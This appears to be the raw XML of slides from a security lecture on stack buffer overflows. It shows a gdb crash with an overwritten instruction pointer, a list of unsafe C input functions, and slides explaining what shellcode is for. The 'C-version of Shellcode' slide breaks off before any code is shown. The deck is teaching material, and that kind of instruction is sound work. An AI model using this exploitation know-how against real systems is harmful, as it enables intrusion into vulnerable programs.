              <a:t>overflow_example.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Segmentation fault (core dumped)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Starting program: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault.0x31303220 in ?? ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>registers</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd1fc  -11780</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x8048521	 134513953</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x908ff4	 9474036</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0xffffd210	 0xffffd210</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x6c6c6166	 0x6c6c6166</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>edi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x0	        0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>   0x31303220	 0x31303220e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1900" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194381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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“Overflowing” Functions </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="560131" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gets() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-- note that data cannot contain newlines or EOFs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vsprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fscanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… and also custom input routines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="63736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0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01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01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01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01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60" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>How to Exploit a Stack Overflow</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="531461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Different variations to accommodate different architectures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assembly instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operating system calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Alignment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Linux buffer overflows for 32-bit architectures explained in the paper “Smashing The Stack For Fun And Profit” by Aleph One, published on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Magazine, 49(7)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189711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14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14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146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146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146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474" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The x86 CPU Family</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1001475" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8088, 8086: 16 bit registers, real-mode only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80286: 16-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80386: 32-bit registers, 32-bit protected mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80486/Pentium/Pentium Pro: Adds few features, speed-up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium MMX: Introduces the multimedia extensions (MMX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium II: Pentium Pro with MMX instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium III: Speed-up, introduces the Streaming SIMD Extensions (SSE) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pentium 4: Introduces the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>NetBurst</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> architecture</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Xeon: Introduces Hyper-Threading</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Core: Multiple cores</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AMD Opteron: 64 bit architecture</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29573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14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14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14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014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014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014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0147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0147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0147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0147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014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Shellcode Goal</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We want to execute arbitrary code in the vulnerable application's process space</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This code has the same privileges as the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the standard term for this type of code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Called shellcode because classic example is code to execute /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Really just assembly code to perform specific purpose</a:t>
            </a:r>
          </a:p>
          <a:p>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190</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10133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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C-version of Shellcode</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="534531" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
